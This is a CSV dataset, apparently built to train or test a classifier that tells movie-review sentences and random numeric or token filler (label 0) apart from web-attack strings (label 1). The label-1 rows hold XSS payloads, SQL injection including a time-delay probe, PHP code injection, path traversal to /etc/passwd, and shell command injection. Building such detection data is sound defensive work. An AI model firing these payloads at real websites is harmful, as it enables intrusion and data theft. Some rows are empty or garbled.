sentence1,label,idx The Sweetest Thing is expressly for idiots who don't care what kind of sewage they shovel into their mental gullets to simulate sustenance.,0,22538 "Wouldn't it be funny if a bunch of Allied soldiers went undercover as women in a German factory during World War II? Um, no. But here's a movie about it anyway.",0,24228 XSS,1,3526 "test",1,3102 "The film may appear naked in its narrative form... but it goes deeper than that, to fundamental choices that include the complexity of the Catholic doctrine",0,15537 58|57|56|56|55|53|53|52|52|60|61|50|50|49|46|46|47|44|44|41|41|42|39|38|38|36|35|35|34|33|33|63|34|37|36|37|40|39|40|43|42|43|45|45|48|47|48|49|51|51|62|54|54|55|59|57|58|59|60|61|62|63|0,0,25359 0.586476238,0,29824 4.99683E+11,0,27460 "",1,8788 "",1,10465 Sandra Bullock's best dramatic performance to date (is) almost enough to lift (this) thrill-kill cat-and-mouser...above its paint-by-numbers plot.,0,23020 AwKzT98X,0,26716 "test",1,7659 "",1,8989 Fred Schepisi's tale of four Englishmen facing the prospect of their own mortality views youthful affluence not as a lost ideal but a starting point.,0,17714 "
drag me
drop here",1,4817 "test",1,6187 ,1,8383 <HTML><BODY>,1,1054 "<;SCRIPT a="";>;""; SRC="";"";>;<;/SCRIPT>;",1,2657 "... a delightfully unpredictable, hilarious comedy with wonderful performances that tug at your heart in ways that utterly transcend gender labels.",0,18652 ,1,2028 To show these characters in the act and give them no feelings of remorse -- and to cut repeatedly to the flashback of the original rape -- is overkill to the highest degree.,0,20285 ,1,950 imagine a scenario where Bergman approaches Swedish fatalism using Gary Larson's Far Side humor,0,15825 """;print(md5(31337));$a=""",1,13423 "test",1,4467 "",1,1342 Mostly Martha could have used a little trimming -- 10 or 15 minutes could be cut and no one would notice -- but it's a pleasurable trifle. The only pain you'll feel as the credits roll is your stomach grumbling for some tasty grub.,0,16135 0.805235396,0,29036 0.96717067,0,29138 A captivating and intimate study about dying and loving...,0,18963 a%' --,1,13642 "",1,3352
",1,9096 "
drag me
drop here",1,4718 "`""'>",1,12753 6.33899E+11,0,27158 "test",1,6787 A fake street drama that keeps telling you things instead of showing them.,0,24020 <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">,1,2375 "test",1,3382 "I have no problem with ``difficult'' movies, or movies that ask the audience to meet them halfway and connect the dots instead of having things all spelled out. But first, you have to give the audience a reason to want to put for that effort",0,23700 "As the sulking, moody male hustler in the title role, (Franco) has all of Dean's mannerisms and self-indulgence, but none of his sweetness and vulnerability.",0,20575 "",1,8406 turns a potentially interesting idea into an excruciating film school experience that plays better only for the film's publicists or for people who take as many drugs as the film's characters,0,23377 "You can watch, giggle and get an adrenaline boost without feeling like you've completely lowered your entertainment standards.",0,18638 ",1,11819 4.14385E+11,0,27186 a3UNMn0X,0,26673 "The beautiful, unusual music is this film's chief draw, but its dreaminess may lull you to sleep.",0,24194 13615076407,0,27540 "Newton draws our attention like a magnet, and acts circles around her better known co-star, Mark Wahlberg.",0,14286 "This story still seems timely and important. And there's an element of heartbreak to watching it now, with older and wiser eyes, because we know what will happen after Greene's story ends.",0,16162 "<IMG LOWSRC=\""javascript:alert(884)\"">",1,12164 values=javascript:alert(1)>,1,11220 It all drags on so interminably it's like watching a miserable relationship unfold in real time.,0,20872 "test",1,6205 "test",1,1652 That the Chuck Norris ``grenade gag'' occurs about 7 times during Windtalkers is a good indication of how serious-minded the film is.,0,19732 test",1,5192 "A small gem of a movie that defies classification and is as thought-provoking as it is funny, scary and sad.",0,18693 Leigh succeeds in delivering a dramatic slap in the face that's simultaneously painful and refreshing.,0,16814 <TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE>,1,2394 yFZU5gJo,0,26812 "There are moments in this account of the life of artist Frida Kahlo that are among cinema's finest this year. Unfortunately, they're sandwiched in between the most impossibly dry account of Kahlo's life imaginable.",0,14663 "",1,2546 "">123",1,12422 FbLHJUdZ,0,26880 Forget the Psychology 101 study of romantic obsession and just watch the procession of costumes in castles and this won't seem like such a bore.,0,20119 XSS,1,6100 --> -->,1,1634 "test",1,8017 0.240550215,0,29334 file:\\\c:/Windows/system.ini,1,13532 23|22|21|18|18|17|16|15|13|13|14|20|14|15|16|17|19|19|20|21|22|23|0,0,25554 "<SCRIPT SRC=\""\""></SCRIPT>",1,1059 Mlokse47,0,26856 "Starts off with a bang, but then fizzles like a wet stick of dynamite at the very end. It's still worth a look.",0,14645 Tedious Norwegian offering which somehow snagged an Oscar nomination.,0,23356 0.286948341,0,29337 "Dazzling in its complexity, disturbing for its extraordinary themes, The Piano Teacher is a film that defies categorisation. It haunts, horrifies, startles and fascinates; it is impossible to look away. Ah yes, and then there's the music...",0,15485 a&cat$pe $pe/etc$pe/passwd&,1,13935 "K-19 will not go down in the annals of cinema as one of the great submarine stories, but it is an engaging and exciting narrative of Man confronting the Demons of his own fear and paranoia.",0,16634 "",1,464 "",1,10970 Don't hate El Crimen del Padre Amaro because it's anti-Catholic. Hate it because it's lousy.,0,24332 "A feature-length, R-rated, road-trip version of Mama's Family.",0,19584 "Hardly a nuanced portrait of a young woman's breakdown, the film nevertheless works up a few scares.",0,23525 file:///c:/Windows/system.ini,1,13785 XSS,1,3186 ,1,12085 The uneven movie does have its charms and its funny moments but not quite enough of them.,0,24500 I hate this movie,0,22376 ,1,872 34|33|31|30|29|28|28|27|26|25|25|24|23|22|20|19|19|21|20|21|22|23|24|35|26|27|32|29|30|31|32|33|34|35|0,0,24993 0.986757921,0,29330 "test",1,5929 Collapses under its own meager weight.,0,22823 "test",1,367 "<;IMG SRC="";jav ascript:alert(';XSS';);"";>;",1,2640 MR6kncoE,0,26249 XSS,1,2956 javapgno=2 ??XSS??,1,2323 ,1,3048 "Hardly a masterpiece, but it introduces viewers to a good charitable enterprise and some interesting real people.",0,15695 test,1,7022 "`""'>",1,11777 "test",1,10758 0.049238586,0,29304 7.68617E+11,0,27515 The philosophical musings of the dialogue jar against the tawdry soap opera antics of the film's action in a way that is surprisingly enjoyable.,0,19253 "test",1,6896 XSS,1,8277 "The documentary does little, apart from raising the topic, to further stoke the conversation.",0,21090 "What a concept, what an idea, what a thrill ride. This is a more fascinating look at the future than ``Bladerunner'' and one of the most high-concept sci fi adventures attempted for the screen.",0,18049 @keyframes slidein {}",1,9288 """>",1,12786 A disturbing examination of what appears to be the definition of a 'bad' police shooting.,0,16233 'Like a child with an important message to tell...(Skins') faults are easy to forgive because the intentions are lofty.',0,16572 "How can such a cold movie claim to express warmth and longing? In truth, it has all the heart of a porno flick (but none of the sheer lust).",0,23199 "The movie is well done, but slow.",0,16000 XSS,1,8276 Writer/ director M. Night Shyamalan's ability to pull together easily accessible stories that resonate with profundity is undeniable.,0,19065 "A sharp, amusing study of the cult of celebrity.",0,16032 64|63|63|62|61|60|59|58|57|57|66|67|56|55|53|53|52|48|47|44|44|45|43|43|42|42|50|41|40|38|37|37|36|36|69|39|38|39|40|41|51|49|46|45|46|47|48|49|50|51|52|54|54|55|56|68|58|59|60|61|62|65|64|65|66|67|68|69|0,0,24991 42|41|40|40|43|39|38|37|36|36|33|32|31|31|30|28|27|27|26|24|24|25|35|25|26|29|28|29|30|34|32|33|34|35|45|37|38|39|44|41|42|43|44|45|0,0,25095 3.72051E+11,0,27748 "What we have here isn't a disaster, exactly, but a very handsomely produced let-down.",0,23942 Director Jay Russell weighs down his capricious fairy-tale with heavy sentiment and lightweight meaning.,0,23899 "<;IMG SRC="";mocha:[code]"";>;",1,2599 "",1,12881 1.50301E+11,0,27069 K8skA6o2,0,26153 0.512595544,0,29888 "


",1,7322 a%' --,1,13888 /../../../../../../../../../../../../../../../../etc/passwd,1,13550 "It turns out to be a cut above the norm, thanks to some clever writing and sprightly acting.",0,15018 0.811977239,0,29764 "More intimate than spectacular, E.T. is carried less by wow factors than by its funny, moving yarn that holds up well after two decades.",0,17626 "Care deftly captures the wonder and menace of growing up, but he never really embraces the joy of Fuhrman's destructive escapism or the grace-in-rebellion found by his characters.",0,20969 "<;STYLE>;.XSS{background-image:url("";javascript:alert(1899)"";);}<;/STYLE>;<;A CLASS=XSS>;<;/A>;",1,13177 6.67661E+11,0,27477 "Singer/composer Bryan Adams contributes a slew of songs -- a few potential hits, a few more simply intrusive to the story -- but the whole package certainly captures the intended, er, spirit of the piece.",0,14302 "<",1,664 "Despite the 2-D animation, The Wild Thornberrys Movie makes for a surprisingly cinematic experience.",0,15601 0.929875042,0,29026 Snow Dogs finds its humour in a black man getting humiliated by a pack of dogs who are smarter than him,0,20215 It is hard not to be especially grateful for freedom after a film like this.,0,18545 40|37|36|36|35|33|33|34|32|30|30|29|29|28|27|25|24|23|22|22|26|23|24|25|26|27|28|41|31|31|32|39|34|35|38|37|38|39|40|41|0,0,24980 "Basically, it's pretty but dumb.",0,23111 29|28|28|27|26|25|24|23|22|21|20|19|17|17|18|31|18|19|20|21|22|23|24|25|26|27|30|29|30|31|0,0,25727 I have to admit that I am baffled by Jason X.,0,20181 XSS,1,7789 "a'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'",1,13385 ,1,4458 1.02489E+12,0,27053 #`-alert(1),1,11374 0.998101083,0,29093 "test",1,7855 A rigorously structured and exquisitely filmed drama about a father and son connection that is a brief shooting star of love.,0,15329 "",1,9605 Nothing plot-wise is worth e-mailing home about.,0,21470 "Bon app茅tit! Just like a splendid meal, Red Dragon satisfies 鈥?from its ripe recipe, inspiring ingredients, certified cuisine and palatable presentation.",0,18256 ,1,6240 8.32164E+11,0,27504 "While some of the camera work is interesting, the film's mid-to-low budget is betrayed by the surprisingly shoddy makeup work.",0,22584 ,1,4455 ,1,4011 "It is amusing, and that's all it needs to be.",0,15518 0.323666781,0,29759 "

",1,8076 "",1,12514 "With recent tensions rekindled by the Kathleen Soliah trial and the upcoming trial of SLA members Emily and William Harris, not to mention Sept. 11, its difficult these days to appreciate Fire's bright side.",0,21665 J2M76KHB,0,26330 right click this!,1,11248 "",1,9789 Sweet Home Alabama certainly won't be remembered as one of (Witherspoon's) better films.,0,23679 An average coming-of-age tale elevated by the wholesome twist of a pesky mother interfering during her son's discovery of his homosexuality.,0,16062 "test",1,5951 QBYDEkVK,0,26007 ,1,641 test,1,8118 Oliveira seems to pursue silent film representation with every mournful composition.,0,18536 0.156389181,0,29801 "
X",1,1945 "",1,8751 """>",1,12787 6.49409E+11,0,27227 "Occasionally funny, always very colorful and enjoyably overblown in the traditional Almod贸var style.",0,15048 ${@print(md5(31337))}\,1,14084 28|27|26|25|24|24|20|19|19|21|18|17|16|16|23|17|18|22|20|21|22|23|29|25|26|27|28|29|0,0,25541 "
",1,9677 "Some episodes work, some don't.",0,19509 "test",1,6625 Watstein handily directs and edits around his screenplay's sappier elements ... and sustains Off the Hook's buildup with remarkable assuredness for a first-timer.,0,14919 "This wretchedly unfunny wannabe comedy is inane and awful - no doubt, it's the worst movie I've seen this summer.",0,20114 mE9RsUux,0,26269 "The movie is genial but never inspired, and little about it will stay with you.",0,24156 "`""'>",1,12674 alert(1497)0,1,12777 0.849395193,0,29063 A movie in which two not very absorbing characters are engaged in a romance you can't wait to see end.,0,20778 47|44|43|42|42|41|38|38|37|37|36|35|33|32|31|31|30|28|27|27|26|25|25|46|26|29|28|29|30|34|32|33|34|35|36|40|39|39|40|41|45|43|44|45|46|47|0,0,25642
    test,1,7134 0.940560565,0,29009 What begins as a film in the tradition of The Graduate quickly switches into something more recyclable than significant.,0,19052 "It's another retelling of Alexandre Dumas' classic. Why? Who knows, but it works under the direction of Kevin Reynolds.",0,16866 24|24|20|19|19|21|18|17|16|15|14|14|23|15|16|17|18|22|20|21|22|23|25|25|0,0,25542 "",1,9003 test,1,7352 1.09753E+11,0,26932 "�",1,1482 "",1,9460 Terrific casting and solid execution give all three stories life.,0,17271 4.56173E+11,0,27740 4.70681E+11,0,27861 "",1,8741 "<;IMG LOWSRC="";javascript:alert(1889);"";>;",1,13167 "Human Nature initially succeeds by allowing itself to go crazy, but ultimately fails by spinning out of control.",0,21559 "test",1,8012 0.698394206,0,28352 "javascript:alert(1305);",1,12585 0.86162788,0,28801 0.838715757,0,28306 A very funny movie.,0,14423 "We admire this film for its harsh objectivity and refusal to seek our tears, our sympathies.",0,18203 <IFRAME SRC= <,1,2432 Ryan Gosling ... is at 22 a powerful young actor.,0,16067 HvAFLcxU,0,26310 3.31278E+11,0,27325 "",1,9030 What's infuriating about Full Frontal is that it's too close to real life to make sense. What's invigorating about it is that it doesn't give a damn.,0,18237 "Its lack of quality earns it a place alongside those other two recent Dumas botch-jobs, The Man in the Iron Mask and The Musketeer.",0,21759 "",1,9001 6.42439E+11,0,27162 """;a=prompt,a()//",1,151 "
    ",1,2489 "
    ",1,8662 "Film can't quite maintain its initial momentum, but remains sporadically funny throughout.",0,18157 "While the ideas about techno-saturation are far from novel, they're presented with a wry dark humor.",0,15308 "test",1,5222 "Outside of Burger's desire to make some kind of film, it's really unclear why this project was undertaken",0,20542 nZxvDwCY,0,26702 XSS,1,6676 "
    ",1,12305 Some movies are like a tasty hors-d'oeuvre; this one is a feast.,0,15050 0.215546029,0,29480 "",1,9586 "",1,2084 ",1,4762 "The film boasts at least a few good ideas and features some decent performances, but the result is disappointing.",0,24078 Ul8RLk04,0,25927 "",1,12498 "Not always too whimsical for its own good (but enough to do harm), this strange hybrid of crime thriller, quirky character study, third-rate romance and female empowerment fantasy never really finds the tonal or thematic glue it needs.",0,21729 One of the worst movies of the year.,0,24620 a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert(1826);")"; eval(a+b+c+d);,1,13105 0.266759556,0,29985 This is a sincerely crafted picture that deserves to emerge from the traffic jam of holiday movies.,0,16952 test,1,8009 "<IMG \""\""\""><SCRIPT>alert(927)</SCRIPT>\"">",1,12207 XSS,1,4441 "Below may not mark Mr. Twohy's emergence into the mainstream, but his promise remains undiminished.",0,15991 "test",1,10800 0.990303355,0,29708 "Though it goes further than both, anyone who has seen The Hunger or Cat People will find little new here, but a tasty performance from Vincent Gallo lifts this tale of cannibal lust above the ordinary.",0,20622 "
      ",1,9307 A string of rehashed sight gags based in insipid vulgarity.,0,21062 25|20|19|19|21|18|18|23|24|26|27|17|16|16|29|17|28|22|20|21|22|23|24|25|26|27|28|29|0,0,25465 "It is the sheer, selfish, wound-licking, bar-scrapping doggedness of Leon's struggle to face and transmute his demons that makes the movie a spirited and touching occasion, despite its patchy construction.",0,15597 0.251117758,0,29053 9.13932E+11,0,27854 0.254021849,0,29642 "Great story, bad idea for a movie.",0,21639 "... a good, if not entirely fresh, look at war.",0,15592 "",1,9799 "
      ",1,3890 "test",1,1755 "test",1,7853


      ,1,5453 "test",1,5678 A sleek advert for youthful anomie that never quite equals the sum of its pretensions.,0,23454 test,1,10808 "test",1,6784 "test",1,2961 Can I admit XXX is as deep as a Petri dish and as well-characterized as a telephone book but still say it was a guilty pleasure?,0,18935 "More honest about Alzheimer's disease, I think, than Iris.",0,15184 "smart, funny and just honest enough to provide the pleasures of a slightly naughty, just-above-average off- Broadway play.",0,17088 0.222817228,0,28280 "
    • test
    • ",1,6377 "",1,9811 "Unless Bob Crane is someone of particular interest to you, this film's impressive performances and adept direction aren't likely to leave a lasting impression.",0,23057 ,1,5671 "Wow, so who knew Charles Dickens could be so light-hearted?",0,18063 "",1,2771 "",1,8792 test",1,11647 Most of the movie is so deadly dull that watching the proverbial paint dry would be a welcome improvement.,0,23633 requires scrolling,1,5693 3.19228E+11,0,27732 The script by Vincent R. Nebrida ... tries to cram too many ingredients into one small pot.,0,19702 ,1,13227 "Do not, under any circumstances, consider taking a child younger than middle school age to this wallow in crude humor.",0,21572 0.994962416,0,28748 XSS,1,4034 test,1,4501 0.716354895,0,29871 "",1,9596 43|41|41|40|39|39|38|37|36|35|34|34|33|32|29|29|28|27|26|25|24|24|31|25|26|27|28|30|30|31|32|33|45|35|36|37|38|44|40|42|42|43|44|45|0,0,24964 "",1,8797 "The whole damn thing is ripe for the Jerry Springer crowd. It's all pretty cynical and condescending, too.",0,21661 XSS,1,6221 "Lucky Break is perfectly inoffensive and harmless, but it's also drab and inert.",0,22459 It's a Count for our times.,0,14753 "
        ",1,8752 "This humbling little film, fueled by the light comedic work of Zhao Benshan and the delicate ways of Dong Jie, is just the sort for those moviegoers who complain that 'they don't make movies like they used to anymore.'",0,18520 Stephen Earnhart's homespun documentary Mule Skinner Blues has nothing but love for its posse of trailer park denizens.,0,14403 "
        drag me
        drop here",1,4548 0.847185336,0,29366 requires scrolling,1,2948 There's something to be said for a studio-produced film that never bothers to hand viewers a suitcase full of easy answers.,0,19092 "'""`>",1,11633 0.328765306,0,29597 9eLz4bNs,0,26682 "A mess, but it's a sincere mess.",0,16563 "Well, Jason's gone to Manhattan and Hell, I guess a space station in the year 2455 can be crossed off the list of ideas for the inevitable future sequels (hey, don't shoot the messenger).",0,22764 0.712479051,0,28357 Horrendously amateurish filmmaking that is plainly dull and visually ugly when it isn't incomprehensible.,0,23124 "test",1,5885 The limited sets and small confined and dark spaces also are homages to a classic low-budget film noir movie.,0,15999 "b=\""URL(\\""\"";",1,1043 0.796710883,0,29605 "
        ",1,4902 "",1,9296 """onpointerover=alert(1) //",1,11197 http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg,1,13485 "test",1,6125
        ,1,7936 fear dot com is so rambling and disconnected it never builds any suspense.,0,22133 0.448085136,0,29753 "I was hoping that it would be sleazy and fun, but it was neither.",0,24414 "test",1,11723 "It represents better-than-average movie-making that doesn't demand a dumb, distracted audience.",0,14637 Delirious fun.,0,24708 "I like it. No, I hate it. No, I love it...hell, I dunno.",0,19961 yClThcGV,0,26449 "It doesn't quite work, but there's enough here to make us look forward to the Russos' next offering.",0,21867 "Kapur fails to give his audience a single character worth rooting for (or worth rooting against, for that matter).",0,24127 "Enjoyably dumb, sweet, and intermittently hilarious -- if you've a taste for the quirky, steal a glimpse.",0,16298 ,1,4134 "
        ",1,8905 26|25|23|23|22|20|20|19|17|17|16|15|15|27|16|18|18|19|21|21|22|24|24|25|26|27|0,0,25596 "<A HREF=\""http://0x42.0x0000066.0x7.0x93/\"">XSS</A>",1,1077 There's no point in extracting the bare bones of Byatt's plot for purposes of bland Hollywood romance.,0,19497 "
        drag me
        drop here",1,4535 This is more a case of 'Sacre bleu!' than 'Magnifique'.,0,22435 [clickme](javascript:alert`1`),1,11143 "...plays like a badly edited, 91-minute trailer (and) the director can't seem to get a coherent rhythm going. In fact, it doesn't even seem like she tried.",0,19463 "Hilarious, acidic Brit comedy.",0,14771 XSS,1,7742 "Antwone Fisher certainly does the trick of making us care about its protagonist and celebrate his victories but, with few exceptions, it rarely stoops to cheap manipulation or corny conventions to do it.",0,16005 0.503363992,0,28908 "It's not like having a real film of Nijinsky, but at least it's better than that eponymous 1980 biopic that used soap in the places where the mysteries lingered.",0,17680 """`'>",1,1812 "A pathetic exploitation film that tries to seem sincere, and just seems worse for the effort.",0,20391 a';cat$pe $pe/etc$pe/passwd;',1,13692 I can't remember the last time I saw worse stunt editing or cheaper action movie production values than in Extreme Ops.,0,20142 "test",1,4472 47|41|41|39|38|37|37|36|35|34|34|43|44|33|31|30|30|29|27|27|26|25|25|46|26|28|28|29|32|31|32|33|45|35|36|40|38|39|40|42|42|43|44|45|46|47|0,0,25018 "",1,7100 0.568836459,0,28900 "test",1,7402 "The movie takes itself too seriously and, as a result, it makes for only intermittent fun.",0,21696 16|15|14|14|17|13|11|11|12|19|12|13|18|15|16|17|18|19|0,0,25641 "",1,9846 0.453835507,0,28515 OQtj2Isu,0,26879 "",1,12285 "Partly a schmaltzy, by-the-numbers romantic comedy, partly a shallow rumination on the emptiness of success -- and entirely soulless.",0,19994 ...the last time I saw a theater full of people constantly checking their watches was during my SATs.,0,21530 "",1,12301 "Mr. Deeds is sure to give you a lot of laughs in this simple, sweet and romantic comedy.",0,24698 Most of the action setups are incoherent.,0,22084 ../../../../../../../../../../../../../../../../etc/passwd,1,13548 "'""()&%",1,13508 "
        ,1,3885 "",1,2080 Too much of it feels unfocused and underdeveloped.,0,20952 """>",1,13146 2IAH3lzE,0,26697 XSS,1,6176 plays like an unbalanced mixture of graphic combat footage and almost saccharine domestic interludes that are pure Hollywood.,0,23497 "Although laced with humor and a few fanciful touches, the film is a refreshingly serious look at young women.",0,15436 "Instead of accurately accounting a terrible true story, the film's more determined to become the next Texas Chainsaw Massacre. But what about the countless other people who'd merely like to watch a solid tale about a universally interesting soul?",0,21451 "",1,8386 6.82406E+11,0,27601 "",1,9220 One just waits grimly for the next shock without developing much attachment to the characters.,0,20673 "",1,11889 <,1,1145 "test",1,10689 "",1,10385 "Like all abstract art, the film does not make this statement in an easily accessible way, and -- unless prewarned -- it would be very possible for a reasonably intelligent person to sit through its tidal wave of imagery and not get this vision at all.",0,21081 "it sounds sick and twisted, but the miracle of Shainberg's film is that it truly is romance",0,14686 El Crimen Del Padre Amaro would likely be most effective if used as a tool to rally anti-Catholic protestors.,0,22487 "",1,9542 A tasty slice of droll whimsy.,0,18001 "Although Disney follows its standard formula in this animated adventure, it feels more forced than usual.",0,19606 Brosnan is more feral in this film than I've seen him before and Halle Berry does her best to keep up with him.,0,18761 """/>",1,430 "Full of detail about the man and his country, and is well worth seeing.",0,18476 "I liked About Schmidt a lot, but I have a feeling that I would have liked it much more if Harry & Tonto never existed.",0,16258 ...too dull to enjoy.,0,22203 ,1,13028 "The high-concept scenario soon proves preposterous, the acting is robotically italicized, and truth-in-advertising hounds take note: There's very little hustling on view.",0,24523 A wildly inconsistent emotional experience.,0,21199 "test",1,3129 53|50|47|47|46|46|45|45|44|41|41|42|40|39|39|38|36|34|34|33|33|31|30|29|28|28|32|29|30|31|32|37|35|35|36|37|38|52|40|43|42|43|44|51|49|48|48|49|50|51|52|53|0,0,25855 8.52866E+11,0,27632 0.584141941,0,29544 "test",1,10782 "Lan Yu is certainly a serviceable melodrama, but it doesn't even try for the greatness that Happy Together shoots for (and misses).",0,22568 Director Chris Eyre is going through the paces again with his usual high melodramatic style of filmmaking.,0,22560 XSS,1,7413 "Prurient playthings aside, there's little to love about this English trifle.",0,21334 "",1,9245 requires scrolling,1,3435 5.93921E+11,0,27724